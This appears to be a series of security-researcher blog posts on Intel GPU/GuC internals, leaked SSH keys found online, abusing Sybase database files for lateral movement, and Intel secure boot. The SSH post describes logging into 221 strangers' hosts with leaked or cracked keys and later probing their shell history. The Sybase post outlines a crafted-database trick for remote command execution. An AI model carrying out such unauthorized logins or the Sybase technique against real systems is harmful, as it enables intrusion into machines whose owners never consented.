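static const GtConfig SKYLAKE_GT3 = { 2, 3, 8 };
static const GtConfig SKYLAKE_GT4 = { 3, 3, 8 };
```

With these numbers GT2, GT3 and GT4 come out at 24, 48 and 72 EUs respectively.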

Gen9 Architecture

The graphics engine is also connected straight to the IOSF (Intel On-chip System Fabric, the internal bus; see the secure boot post) through a controller called Gunit. Gunit is connected to both the primary and secondary IOSF and exports functions for communicating with the graphics engine and implementing IOMMU support for graphics memory and unified memory.

All of this is connected to the display IO interconnect and output to DisplayPort and HDMI outputs.

Gen9 Architecture

2D Graphics Pipeline

The 2D graphics engine is a standalone IP block in the unslice area, and has its own command streamer, registers and cache. It has 256 different operation codes, for example:

2D BitBlt Operations

3D Graphics Pipeline

The fixed function pipeline in the unslice implements the DirectX 11 rendering pipeline stages: Vertex Fetch -> Vertex Shader -> Hull Shader -> Tessellator -> Domain Shader -> Geometry Shader -> Clipper -> Windower -> Z Ordering -> Pixel Shader -> Pixel Output. Some of these functions are self-contained, but many are implemented by running shader programs on the EUs in the slices. EUs can send certain operations back into dedicated hardware units.

The Execution Units (EUs)

The EUs are in-order multithreaded SIMD processing cores. Each dispatched execution thread has its own 128-register space and executes programs called "kernels". All instructions are 8 channels wide, i.e. they operate on 8 registers at a time (or 16 half registers). The EU supports arithmetic, logical and control flow instructions on floats and ints. Registers are addressed by address. The EU thread dispatcher implements priorities based on age, i.e. oldest is highest priority, and on whether the thread is blocked waiting on instruction fetches, register dependencies, etc.

The GuC

The GuC is a small embedded core that supports graphics scheduling, power management and firmware attestation. It is implemented in an i486DX4 CPU (also called P24C and Minute IA), although it seems that since Broadwell it has been extended to the Pentium (i586) ISA. It runs a small microkernel called μOS. The GuC μOS runs only kernel level tasks (even though μOS supports μApps). The firmware is written in C with no stdlib. In the GuC we can find supporting blocks: ROM memory, 8KB of on-core L1 cache, 64KB/128KB/256KB (Broadwell/Skylake/CannonLake) of SRAM which is used for code+data+cache, and an 8KB stack. It also has power management, a DMA engine, etc. Communication with the GuC is done through memory-mapped IO and bidirectional interrupts.

GuC architecture

The GuC offers a lightweight mechanism for dispatching work the host submits to the GPU. This means the GPU driver does not need to handle dispatch and job queuing, making it much faster. The user mode driver (UMD) can communicate with the GuC directly when required and bypass the need to context switch the main CPU into kernel mode. The kernel mode driver (KMD) uses the GuC as a gateway for job submission as well. This simplifies the kernel and provides a single point where all jobs are submitted. Communication between the UMD and the GuC is done through shared memory queues.

Why is the GuC interesting? Because I think it can communicate with the CSME, CPU and GPU and everything over the IOSF, and if it has bugs it can be used to gain very privileged access to the system and memory.

Boot ROM and GuC firmware

At system startup the GuC is held in reset until the UEFI firmware initializes the shared memory region for the GPU. Inside the shared region a special subregion called WOPCM is set aside for the GuC (and HuC) firmware. The GuC is then released from reset and in turn starts executing a small non-modifiable Boot ROM (16/32KB in size) that initializes the basic GuC hardware and waits for an interrupt signalling that the firmware has been copied to the WOPCM region. The GuC firmware is an opaque blob supplied by Intel as part of the GPU KMD, which copies it to the shared memory region (GGTT) and signals the Boot ROM with an interrupt. The Boot ROM verifies the firmware's digital signature (a SHA256 hash + PKCSv2.1 RSA signature), and if the check passes copies the firmware to SRAM and starts executing it.

The GuC firmware can be extracted from the graphics driver and reversed. Screenshot of IDA open on the Kaby Lake GuC: GuC firmware

The GuC also attests the firmware for the video decoder unit, called HuC. The HuC is an HEVC/H.265 decoder implemented in hardware.

The μOS kernel

The μOS kernel runs in 32-bit protected mode, with no paging and an old-style segment model (CS, DS, etc.). All code runs in ring0. The OS handles HW/SW exceptions and crashes, and supplies debugging and logging services.

Interrupts are handled through the local APIC - I found interrupts coming from the IOMMU, power management, display interfaces, the GPU and the CPU.

It runs a single process - which initializes the system and then waits for interrupts/events in a loop.

Communication with the OS

Commands are dispatched through a ring buffer work queue. Each work item has a header followed by a command. Once a command is posted the CPU notifies the GuC using a "doorbell" interrupt.
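
To make the idea concrete, here is a minimal sketch of a ring buffer work queue where each item is a header followed by a command. Everything in it is hypothetical: the header fields, the 256-byte ring size and the `doorbell` counter (which stands in for the real interrupt) are assumptions for illustration and are not taken from the GuC firmware or the driver.

```c
#include <stdbool.h>
#include <stdint.h>

#define WQ_SIZE 256u                 /* ring size in bytes (assumed, power of two) */

typedef struct {
    uint32_t length;                 /* command bytes following the header */
    uint32_t opcode;                 /* hypothetical command identifier */
} WorkItemHeader;

typedef struct {
    uint8_t  ring[WQ_SIZE];
    uint32_t head;                   /* consumer byte counter (GuC side) */
    uint32_t tail;                   /* producer byte counter (host side) */
    uint32_t doorbell;               /* counter standing in for the doorbell interrupt */
} WorkQueue;

/* Byte-wise copies that wrap around the end of the ring. */
static void ring_write(WorkQueue *q, uint32_t pos, const void *src, uint32_t n)
{
    const uint8_t *s = src;
    for (uint32_t i = 0; i < n; i++)
        q->ring[(pos + i) % WQ_SIZE] = s[i];
}

static void ring_read(const WorkQueue *q, uint32_t pos, void *dst, uint32_t n)
{
    uint8_t *d = dst;
    for (uint32_t i = 0; i < n; i++)
        d[i] = q->ring[(pos + i) % WQ_SIZE];
}

/* Host side: append header + command, then "ring the doorbell". */
bool wq_post(WorkQueue *q, uint32_t opcode, const void *cmd, uint32_t len)
{
    uint32_t hdr  = (uint32_t)sizeof(WorkItemHeader);
    uint32_t used = q->tail - q->head;
    if (len > WQ_SIZE - hdr || hdr + len > WQ_SIZE - used)
        return false;                /* not enough free space */

    WorkItemHeader h = { len, opcode };
    ring_write(q, q->tail, &h, hdr);
    ring_write(q, q->tail + hdr, cmd, len);
    q->tail += hdr + len;
    q->doorbell++;
    return true;
}

/* Consumer side: pop the oldest item, if any, into the caller's buffers. */
bool wq_fetch(WorkQueue *q, WorkItemHeader *h, void *cmd, uint32_t cap)
{
    uint32_t hdr = (uint32_t)sizeof(WorkItemHeader);
    if (q->head == q->tail)
        return false;                /* queue is empty */
    ring_read(q, q->head, h, hdr);
    if (h->length > cap)
        return false;                /* caller's buffer is too small */
    ring_read(q, q->head + hdr, cmd, h->length);
    q->head += hdr + h->length;
    return true;
}
```

Note the bounds checks in both directions: from a security point of view, a consumer that trusts the `length` field in a header written by the other side is exactly the kind of place worth auditing.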

The Windows kernel mode driver supports GuC debugging by setting a registry key:

\\REGISTRY\MACHINE\SOFTWARE\Intel\KMD\GuC\\
    GuCEnableUkLogging=1

\\REGISTRY\MACHINE\SOFTWARE\Intel\KMD\GuC\\
    GuCLoggingVerbositySelect=0/1/2/3 (low, medium, high, max)

Host Graphics Architecture

So far we only discussed hardware. The software part of the graphics stack is divided into three levels: UEFI DXE, kernel mode and user mode.

UEFI

Traditionally VGA support was implemented with a legacy video BIOS (VBIOS) as a PCI option ROM. In UEFI the VBIOS was turned into a DXE driver called the Graphics Output Protocol (GOP), which supports basic display for the UEFI setup menu and for the OS bootloader. The GOP is supplied by Intel to the UEFI vendor. The GOP supplies two basic functions:

  • Changing the graphics mode - resolution, pixel depth, etc.
  • Getting the physical address of the framebuffer
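
Once the framebuffer address and mode are known, drawing is plain memory writes. The sketch below shows how a pixel's byte offset could be computed, assuming 32-bit pixels; the `FbMode` struct is a hypothetical subset of the mode information the GOP reports, with the corresponding UEFI field names noted in the comments.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical subset of the mode information reported by the GOP. */
typedef struct {
    uint32_t width;                  /* HorizontalResolution */
    uint32_t height;                 /* VerticalResolution */
    uint32_t pixels_per_scan_line;   /* PixelsPerScanLine, may exceed width */
} FbMode;

/* Byte offset of pixel (x, y) from the framebuffer base, assuming 4 bytes
 * per pixel. Returns (size_t)-1 when the coordinates are out of range. */
size_t fb_pixel_offset(const FbMode *m, uint32_t x, uint32_t y)
{
    if (x >= m->width || y >= m->height)
        return (size_t)-1;
    return ((size_t)y * m->pixels_per_scan_line + x) * 4u;
}
```

The row stride uses the scan line length rather than the visible width, since the two can differ.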

The Windows boot loader uses the GOP to set up a memory-mapped video framebuffer before entering VBS, and after the hypervisor and SK are loaded winload accesses the display only through the framebuffer, without invoking the GOP. Windows also uses the GOP for disabling blue screens.

Windows

On Windows, Intel supplies a fairly large graphics driver that implements both the user mode driver (UMD) and kernel mode driver (KMD). Applications using Direct3D communicate through the D3D runtime to the DXGI abstraction interface (in dxgkrnl.sys), which in turn communicates with the KMD. The KMD treats 2D Blt and 3D operations through different pipelines and dispatches the operations to the GPU.

The GPU driver is riddled with telemetry, but I haven't figured out yet how much of it is sent automatically to Intel, although crashes are sent through OCA - Online Crash Analysis.

Basic Memory Management

A very important job of the graphics drivers (both KMD and UMD) is memory management (GMM). The Graphics Memory space is the virtual memory allocated to the GPU, and is translated using the system page tables to the physical RAM. The memory contains stuff like geometry data, textures, etc. The GPU hardware uses Graphics Translation Tables (GTTs) to decode virtual addresses supplied by the software graphics memory space into hardware addresses. The use of MMUs and page tables on both ends (SW & HW) has three main benefits: virtualization, per-process isolated graphics memory and non-contiguous physical memory for better utilization.

The GTTs come in two variants:

  • Global GTT - a single one-level table mapping directly into system pages. It is managed by the HW and configured in UEFI. The UEFI DXE driver maps the GTT into memory and initializes it. It is also called Graphics Stolen Memory (GSM) and Unified Memory Architecture (UMA), not to be confused with CSME's UMA.

  • Per-process GTT (PPGTT). This has changed significantly in the Broadwell graphics engine, so we'll discuss only the new architecture. Modern PPGTT is basically a mirror of the CPU's paging model with 4 paging levels.
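
As an illustration of what "4 paging levels" means for an address, the sketch below splits a graphics virtual address the same way x86-64 4-level paging does: four 9-bit table indexes plus a 12-bit page offset. That the PPGTT uses exactly this 48-bit, 4KB-page split is an assumption here, based only on the statement that it mirrors the CPU's model; the struct and function names are hypothetical.

```c
#include <stdint.h>

/* Indexes for a 4-level walk, top level first, plus the in-page offset. */
typedef struct {
    unsigned pml4;     /* bits 47..39 */
    unsigned pdp;      /* bits 38..30 */
    unsigned pd;       /* bits 29..21 */
    unsigned pt;       /* bits 20..12 */
    unsigned offset;   /* bits 11..0, offset inside a 4KB page */
} PpgttIndexes;

/* Split a 48-bit graphics virtual address into its walk indexes. */
PpgttIndexes ppgtt_split(uint64_t gfx_addr)
{
    PpgttIndexes ix;
    ix.pml4   = (unsigned)((gfx_addr >> 39) & 0x1FF);
    ix.pdp    = (unsigned)((gfx_addr >> 30) & 0x1FF);
    ix.pd     = (unsigned)((gfx_addr >> 21) & 0x1FF);
    ix.pt     = (unsigned)((gfx_addr >> 12) & 0x1FF);
    ix.offset = (unsigned)(gfx_addr & 0xFFF);
    return ix;
}
```

A one-level table such as the Global GTT would, by contrast, need only a single index (the address shifted right by the page size).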

The GMM part of the KMD handles and tracks graphics allocations, manages the GTTs, caching coherence, stolen memory allocation and something I won't go into right now called swizzling. The GMM is essential for performance as it allows memory to be set up by the CPU and then accessed by the GPU directly without copying from system memory to GPU memory.

It's important to note that in modern systems the whole system memory can be used for graphics. The driver reports fictitious "dedicated" video memory, probably to fix old games. Driver memory

Security-wise, the graphics driver needs to make sure a user process can gain access only to memory allocated to that process, and that memory is cleared before it is transferred to a different process.

SVM Mode

Intel GPUs have added support for another organic memory model, the OpenCL SVM model. In SVM mode the GPU and CPU share the exact same page table, so data structures can be shared AS-IS between both, including embedded pointers and such. Five levels of SVM are supported.

  • Coarse grained - CPU & GPU have different buffers
  • Fine grained - CPU & GPU can share memory buffer
  • Fine grained system - CPU & GPU share entire system memory
+-----------------+------------------------------------------------------------------------------+
|                 | Type                                                                         |
+-----------------+-----------------------+--------------------------------+---------------------+
|                 | Coarse-grained buffer | Fine-grained buffer            | Fine-grained system |
+-----------------+                       +-----------------+--------------+                     |
| Type            |                       | without atomics | with atomics |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Shared          | V                     | V               |        V     | V                   |
| virtual         |                       |                 |              |                     |
| address         |                       |                 |              |                     |
| space           |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| No need for     |                       | V               |        V     | V                   |
| explicit        |                       |                 |              |                     |
| mapping by host |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Fine-           |                       | V               |        V     | V                   |
| grained         |                       |                 |              |                     |
| coherency       |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Fine-           |                       |                 |        V     | V                   |
| grained         |                       |                 |              |                     |
| synchronization |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+
| Implicit use    |                       |                 |              | V                   |
| of memory       |                       |                 |              |                     |
| from CPU        |                       |                 |              |                     |
| malloc() from   |                       |                 |              |                     |
| GPU and entire  |                       |                 |              |                     |
| CPU address     |                       |                 |              |                     |
| space           |                       |                 |              |                     |
+-----------------+-----------------------+-----------------+--------------+---------------------+

Cache Coherence

Both the CPUs and GPUs have a complex memory hierarchy involving many caches. For example:

CPU: L1 Cache -> L2 Cache -------------\ 
                                       |------> *System LLC Cache -> eDRAM -> RAM 
GPU: Transient Cache -> GPU L3 Cache --/

GPU memory accesses do not pass through the CPU core's L1+L2 caches, so the GPU implements snooping to maintain memory-cache coherency. The GPU basically sniffs the traffic on the CPU L1/L2 caches, and invalidates its own cache (I think this is relevant only to BigCore CPUs, and on Atom this is optional and very costly). The GPU's transient caches are not snoopable by the CPU and must be explicitly flushed. The GPU L3 Cache is snoopable by the CPU on some Intel platforms.

Boot process

At boot, the operating system and kernel mode driver detect and query the display devices and initialize a default display topology. After boot, display configuration requests are sent to the KMD, which in turn configures the Gen display hardware. There are also cases of display hot-plug during runtime, which are handled by OS user and kernel mode modules/drivers.

Once the driver is loaded, DirectX initializes it through DxgkDdiStartDevice(), which eventually leads to a function that sets up the render function table per architecture:

void setup_render_function_table(HW_DEVICE_EXTENSION *pHwDevExt)
{
    KM_RENDER_CONTEXT   *render_context;

    ...

    switch(get_render_core(pHwDevExt))
    {
    ...
        case GEN3_FAMILY:
            ...
        case GEN4_FAMILY:
            ...
            ...
        case GEN8_FAMILY:
            render_context->FuncTable.PresentBlt                     = func_Gen6PresentBlt;
            render_context->FuncTable.PresentFlip                    = func_Gen6PresentFlip;
            render_context->FuncTable.RenderBegin                    = func_Gen6RenderBegin;
            render_context->FuncTable.Render                         = func_Gen7Render;
            render_context->FuncTable.RenderEnd                      = func_Gen6RenderEnd;
            render_context->FuncTable.GDIRender                      = func_Gen6GDIRender;
            render_context->FuncTable.BuildPagingBuffer              = func_Gen7BuildPagingBuffer;
            render_context->FuncTable.SubmitCommand                  = func_Gen8SubmitCommand;
            render_context->FuncTable.PreemptCommand                 = func_Gen6PreemptCommand;
            render_context->FuncTable.QueryCurrentFenceIRQL          = func_Gen6QueryCurrentFenceIRQL;
            render_context->FuncTable.IdleHw                         = func_Gen6IdleHw;
            render_context->FuncTable.StopHw                         = func_Gen6StopHw;
            render_context->FuncTable.ResumeHw                       = func_Gen6ResumeHw;
            render_context->FuncTable.GetMDLToGttSize                = func_GetMdlToUpdateGTTCmdSize;
            render_context->FuncTable.UpdateMDLToGtt                 = func_MDLToGttUpdateGttCmd;
            render_context->FuncTable.GetMDLToGttSizeOnePage         = func_GetMdlToUpdateGTTCmdSizeOnePage;
            render_context->FuncTable.UpdateMDLToGttOnePage          = func_UpdateOneGttEntry;
            ...

OCA

OCA is a mechanism that lets a driver store device data and send it through Windows Update back to the driver vendor. There are two cases of failures:

  • Windows thinks there is a problem and the driver needs to be reloaded (TDR). Windows calls DxgkDdiCollectDbgInfo(), which lets the driver attach device data to the report. The Intel GPU driver can add more than 1MB of data through DxgkDdiCollectDbgInfo().
  • In case of a blue screen (bugcheck), KmBugcheckSecondaryDumpDataCallback() is called and the driver passes data to it. After both functions the data is converted into an OCA blob using CreateOCAXXXDivision, and it is later uploaded to Microsoft and from there to Intel. The Intel OCA blob contains lots of system and driver information, including what appears to be an Intel-specific unique identifier that the driver assigns to the machine and that can be used for tracking.

Conclusion

In this post we learned the basic components of the graphics stack. In the next post on the graphics stack we'll start looking into security implications.

Analysis of SSH keys found in the wild

8 February 2021 at 05:00

In 2018 I was contracted to help a large organization with a very distributed and remote structure. One of the things that I found was that the organization does not have a strict policy regarding the creation, storage and lifecycle of SSH keys.

I decided to look into this issue in general, so in Feb 2019 I wrote a crawler that looked for SSH keys around the web - public repos, S3 buckets with bad permissions, data dumps from companies and so on.

From this I got 4807 keys. Next I wrote a small Python script that tried the SSH keys - just authenticate and close the connection, without opening any channels, so as not to actually access the target systems, which would be illegal.

I managed to authenticate into 221 hosts: 5 were FreeBSD, 1 was macOS, 3 were Linux on ARM64, and the rest were Linux x64. This means I have 221 working keys found on the web and no way to notify their owners they should change their keys.

General interesting statistics:

  • Of the 4807 keys 966 were malformed and 1036 were encrypted (20%). Of the 1036 encrypted keys I could break 88 passwords using dictionaries and an additional 41 passwords using John the Ripper on a 3-year-old 8-core Xeon workstation after a month of brute-forcing.

  • Sizes (all were SHA256):
    [email protected]:~/keys# for i in id_rsa* ; do ssh-keygen -l -f $i; done | sed 's/:.*//' | sort | uniq -c | sort -n -k 2
        2 1023 SHA256
       37 1024 SHA256
        1 2047 SHA256
     2187 2048 SHA256
        1 3000 SHA256
        1 4048 SHA256
      572 4096 SHA256
        3 8192 SHA256
        1 16384 SHA256
    

    I don't get the weird sizes: 1023-bit, 2047-bit, 3000-bit, and 4048-bit. Anyone have an idea?

  • Encryption type:
    [email protected]:~/enc# grep -h DEK-Info id_rsa* | sed 's/,.*//' | sort | uniq -c
      665 DEK-Info: AES-128-CBC
        2 DEK-Info: AES-256-CBC
       94 DEK-Info: DES-EDE3-CBC
    

    Why still use DES keys?

    For keys that I could not break:

      531 DEK-Info: AES-128-CBC
        2 DEK-Info: AES-256-CBC
       66 DEK-Info: DES-EDE3-CBC
    
  • Distributions (in 2019, from uname):
      • 87 were Ubuntu
      • 38 were RHEL/CentOS 6
      • 25 were RHEL/CentOS 7
      • 7 were Amazon
      • 5 were RHEL/CentOS 5
      • 2 were Debian
      • 2 were CoreOS
      • 1 was Gentoo
      • 1 was Fedora 32
      • 2 were armv7l
      • 1 was armv5tel
      • the rest I could not identify from uname -a

  • Most common kernels (in 2019, from uname):
      • 44 were Linux 2.6.x
      • 39 were Linux 4.4.x
      • 28 were Linux 4.15.x
      • 35 were Linux 3.10.x
      • 15 were Linux 3.13.x
      • 13 were Linux 4.9.x

Last week (after two years!) I reran the test against the 221 working keys and 179 still work. To make sure these are not honeypots I added to the testing script a check for the length of the remote .bash_history file, and none seem to be honeypots.
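
The headline ratios can be recomputed from the counts quoted in this post. The sketch below only does the arithmetic; the constant and function names are made up for illustration.

```c
/* Counts quoted in the post. */
enum {
    KEYS_TOTAL       = 4807,
    KEYS_MALFORMED   = 966,
    KEYS_ENCRYPTED   = 1036,
    CRACKED_DICT     = 88,    /* passwords broken with dictionaries */
    CRACKED_JOHN     = 41,    /* passwords broken with John the Ripper */
    HOSTS_2019       = 221,   /* hosts that accepted a key in 2019 */
    HOSTS_STILL_OPEN = 179    /* hosts that still accepted it two years later */
};

/* part / whole as a percentage; 0 when whole is 0. */
double percent(unsigned part, unsigned whole)
{
    return whole ? 100.0 * part / whole : 0.0;
}

/* Keys that were neither malformed nor encrypted. */
unsigned usable_plain_keys(void)
{
    return KEYS_TOTAL - KEYS_MALFORMED - KEYS_ENCRYPTED;
}
```

With these inputs, roughly a fifth of the keys (about 21.6%) were encrypted, about 12.5% of the encrypted keys had their passwords broken (129 of 1036), and about 81% of the originally working keys still worked two years later. The 2805 keys that were neither malformed nor encrypted match the total of the key size histogram above.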

Abusing Sybase for lateral movement

7 February 2021 at 05:00

A few years ago I was asked to help on a red-team exercise in a company doing hardware R&D.

The company had a very strict password policy, and every computer had a randomized local administrator account password and the local SMB server disabled.

We managed to gain access to one developer's computer but got stuck there. We did find one thing though: many of the developers had Sybase Adaptive SQL server installed on their systems as it was bundled by default with LabVIEW and Siemens Step 7, both in use by the target.

I installed LabVIEW and tried accessing it through the Adaptive SQL client. Looking through the connect dialog I noticed something interesting: one of the options was "Start and connect to a database on another computer":

Sybase connect dialog

When selecting this option you need to specify the DB filename. I tried specifying an SMB server and pressed "Connect". Amazingly, the target computer connected back over an SMB null session to the share I specified. I set up a Samba server that allows anonymous access and placed on it a DB file I crafted with credentials I specified during creation. This time I managed to connect and execute SQL statements against my server. What was more interesting, the account permissions and roles were set by the DB file and not by the host, so I could set up my DB in advance to give my account an administrator role and then execute "xp_cmdshell" on the remote host.

We tried this in the field using ssh port forwarding back home on 445 and got access to most developer computers.

Sybase login dialog

This was quite a few years ago, but looking over the CVE DB for Sybase I don't see any issue that sounds like that, so I guess if you encounter Step7 or LabVIEW during a pentest you now know what to do …

In-depth dive into the security features of the Intel/Windows platform secure boot process

4 February 2021 at 05:00

This blog post is an in-depth dive into the security features of the Intel/Windows platform boot process. In this post I'll explain the startup process through a security-focused lens; in the next post we'll dive into several known attacks and how they were handled by Intel and Microsoft. My wish is to explain to technology professionals not deep into platform security why Microsoft's SecureCore is so important and necessary.

Introduction and System Architecture

We must first begin with a brief introduction to the hardware platform. Skip this if you have read the awesome material available on the web about the Intel architecture; I'll try to briefly summarize it here.

The Intel platform is based on one or two chips. Small systems have one, the desktop and server ones are separated to a CPU complex and a PCH complex (PCH = Platform Controller Hub).

Intel architecture

The CPU complex deals with computation. It holds the "processor" cores, e.g. Sunny Cove that implement the ISA, as well as cross core caches like the L3 cache, and more controllers that are grouped together as "the system agent" or the "uncore". The uncore contains the memory controller and display, e.g. GPU and display controller.

The PCH handles all other IO, including access to the firmware through SPI or eSPI, WiFi, LAN, USB, HD audio, SMBus, Thunderbolt, etc. The PCH also hosts several embedded processors, like the PMC, the Power Management Controller.

An additional part of the PCH is a very important player in our story, the CSME, or Converged Security & Management Engine, an i486 IP block (also called Minute IA). CSME is responsible for much of the security model of Intel processors as well as many of the manageability features of the platform. The CSME block has its own dedicated ~1.5MB of SRAM and 128KB of ROM, as well as a dedicated IOMMU, called the A-Unit (which even has its own acode microcode), located in the CSME's 'uncore', that allows access from the ME to the main memory, as well as DMA to/from the main memory and using the main memory as an encrypted paging area ("virtual memory"). The CSME runs a customized version of the Minix3 microkernel, although recent versions have changed it beyond recognition, adding many security features.

CSME structure

Buses

Let's use this post to also introduce the main interconnects in the system. The main externally facing interconnect bus is PCI-E, a fast bus that can reach 64GBps in its latest incarnations. A second external bus is the LPC, or Low Pin Count bus, a slow bus for connecting devices such as SPI flash, the TPM (explained below), and old peripherals such as PS/2 touchpads.

Internally the platform is based around the IOSF, or Intel On-chip System Fabric, which is a pumped-up version of PCI-E that supports many additional security and addressing features. For addressing, IOSF adds SourceID and DestID fields that contain the source and destination of any IOSF transaction, extending PCI-E Bus-Device-Function (BDF) addressing to enable routing over bridges. IOSF also extends addressing by adding support for multiple address root namespaces, currently defining three: RS0 for host memory space, RS1 for CSME memory space, and RS2 for the Innovation Engine (IE), another embedded controller currently present only on server chipsets. There are two IOSF buses in the PCH: the Primary Fabric and the Sideband Fabric. The Primary Fabric is high speed, connecting the CPU to the PCH (through a protocol called DMI), as well as high-speed devices such as Gigabit Ethernet, WiFi and eSPI. The Sideband Fabric is used to connect the CSME to low-speed devices, including the PMC (Power Management Controller), the random number generator, GPIO pins, USB, SMBus, and even debugging interfaces such as JTAG.

More Components

Another interesting component is the ITH, or Intel Trace Hub, which is codenamed North Peak (NPK). The ITH can trace different internal hardware components (VIS - Visualization of Internal Signals, ODLA - On-chip Logic Analyzer, SoCHAP - SoC performance counters, IPT - Intel Processor Trace, AET - Intel Architecture Trace) and external components like the CSME and the UEFI firmware, and you can even connect it to ETW. This telemetry eventually finds its way to Intel by various methods.

Intel Trace Hub

The TPM is designed to provide a tamper-proof environment to enforce system security through hardware. It implements many essential functions in hardware: the SHA-1 and SHA-256 hashing algorithms, many crypto and key derivation functions, measurement registers called the Platform Configuration Registers (PCRs), a secret key (the Endorsement Key) used to derive all other keys, and non-volatile storage slots for storing keys and hashes. TPMs that are a separate chip on the mainboard or SoC, connected through the LPC, are called discrete TPMs (dTPMs); TPMs implemented in the CSME module's firmware are called firmware TPMs (fTPMs).

The TPM's PCRs are initialized to zero when the platform boots and are filled with measurements during the boot process. PCRs 0-15 are intended for "static" use: they reset when the platform boots and are supposed to give the OS loader a view of the platform initialization state. PCRs 17-22 are for "dynamic" use: they are reset on each secure launch (GETSEC[SENTER]) and are supposed to be used by the attestation software that checks whether the OS is trusted.
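How a PCR gets "filled up" is easier to see in code. A PCR is never written directly: it is extended, meaning the new value is the hash of the old value concatenated with the digest of the thing being measured. Below is a minimal sketch of a SHA-256 bank in plain Python. The class and method names are made up for illustration, and a real TPM is driven through TPM commands, not through anything like this.

```python
import hashlib

PCR_SIZE = 32  # a SHA-256 bank holds 32-byte registers


class ToyPcrBank:
    """Illustrative model of a SHA-256 PCR bank (not a real TPM interface)."""

    def __init__(self, count=24):
        # Simplification: every register starts at zero on platform reset.
        self.pcrs = [bytes(PCR_SIZE) for _ in range(count)]

    def extend(self, index, data):
        """Fold a measurement of `data` into PCR[index] and return the new value."""
        digest = hashlib.sha256(data).digest()
        self.pcrs[index] = hashlib.sha256(self.pcrs[index] + digest).digest()
        return self.pcrs[index]


bank = ToyPcrBank()
bank.extend(0, b"initial boot block")
bank.extend(0, b"pei core")
print(bank.pcrs[0].hex())
```

Because each value depends on the previous one, the final PCR value encodes both what was measured and in which order, which is why a verifier can compare it against a single expected value.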

The Flash Chip

SPI flash has 5 major regions: the Descriptor region, the CSME region, the Gigabit Ethernet region, the Platform Data region, and the UEFI region. In the image below you can see an example of how the flash is organized.

Partition regions in SPI flash Serial flash sizes

Later versions added more regions:

SPI region evolution

These regions are categorized as fault tolerant partitions (FTPs) and non fault tolerant partitions (NFTPs). Fault tolerant partitions are critical for boot and are verified during early boot (like the RBE, the CSME ROM Boot Extension, which we'll discuss in a few paragraphs). If verification fails, the system does not boot. An example of a non fault tolerant partition is the Integrated Sensor Hub (ISH) firmware.

SPI flash protection is applied at multiple levels: On the flash chip itself, in the SPI flash controller (in the PCH), in UEFI code and in CSME code.

The SPI controller maps the entire flash to memory at a fixed address, so reads/writes are usually done simply by reading/writing memory. The SPI controller translates this to flash-specific commands issued on the SPI bus, using a table of flash-specific commands stored in the flash descriptor region. This is called "Hardware Sequencing", meaning the SPI controller issues the actual SPI commands. When hardware sequencing is in use, the SPI controller enforces several flash protections based on the masters region table in the flash (although these can be overridden using a hardware pin).

The SPI controller also implements a FLOCKDN flag. FLOCKDN is a write-once bit that, when set, disables the use of software sequencing and modification of the PR registers until the next reset. The CSME sets this in the Bring-Up process (bup_storage_lock_spi_configuration(), see below). This happens when the UEFI notifies it that it is at the end of POST. In addition to the region access control table, the SPI controller also has an option to globally protect up to five regions in the flash from write access by the host using five registers, called Protected Range registers (PRs), which are intended for the UEFI firmware to protect itself from modification while the OS is running.

It is also possible to issue direct flash commands using "Software Sequencing" by writing to the OPTYPE/OPMENU registers. Since this can be used to circumvent the SPI-enforced protections, software sequencing is usually disabled after POST using the FLOCKDN bit.
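To make the interplay between the PR registers, FLOCKDN and software sequencing concrete, here is a toy model of the lock-down behaviour. It is only a sketch of the logic described above: the class, its methods and the flash offsets are invented for illustration and do not reflect the real register layout of the SPI controller.

```python
class ToySpiController:
    """Toy model of the SPI lock-down behaviour (not real register layouts)."""

    def __init__(self):
        self.flockdn = False          # write-once lock bit, cleared by reset
        self.protected_ranges = []    # (start, end) flash offsets, end exclusive

    def add_protected_range(self, start, end):
        if self.flockdn:
            raise PermissionError("PR registers are locked until the next reset")
        self.protected_ranges.append((start, end))

    def lock_down(self):
        # Once set, the bit cannot be cleared again by software.
        self.flockdn = True

    def host_write_allowed(self, offset):
        return not any(start <= offset < end for start, end in self.protected_ranges)

    def software_sequencing_allowed(self):
        return not self.flockdn

    def reset(self):
        # Simplification: a platform reset clears both the lock and the ranges.
        self.flockdn = False
        self.protected_ranges.clear()


spi = ToySpiController()
spi.add_protected_range(0x500000, 0x1000000)  # made-up offsets for the UEFI region
spi.lock_down()
print(spi.host_write_allowed(0x600000))       # False
print(spi.software_sequencing_allowed())      # False
```

The point of the write-once bit is the ordering: the firmware configures its protections during POST, sets the lock, and from then on nothing running on the host can undo them until the next reset.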

How is the flash updated?

The UEFI region is updated through a UEFI capsule. This update happens during POST, before the PRs and FLOCKDN are set, so the BIOS region is still accessible to UEFI code.

Many OEMs have their own UEFI anti-tamper protections. For example, HP has SureStart on laptops and workstations, and Dell has TrustedDevice SafeBIOS. SafeBIOS copies bad firmware images to the EFI system partition, and the Dell Trusted Device software on Windows sends their hashes, plus the hash of the UEFI firmware currently in memory, to a Dell cloud server (*.delltrusteddevicesecurity.com) to check against a list of "authorized" hashes. Server platforms have similar protections, including iLO for HP and iDRAC for Dell. The CSME region can usually be updated only from within the CSME. However, for more complicated upgrades the CSME can temporarily unlock the ME region for host read & write.

Overview

In the next sections we'll look over all the stages of boot.

Early power on

Boot starts with the PMC, the Power Management Controller. In modern Intel systems the PMC is an ARC core, and it's the first controller to execute code once power is applied to the system. We'll talk more about the PMC in a later post, as it's quite interesting: it has its own microcode and firmware, and even generates telemetry over the IOSF SB bus (which we'll talk about in a moment).

While the PMC does its init, the rest of the system is held in a RESET state.

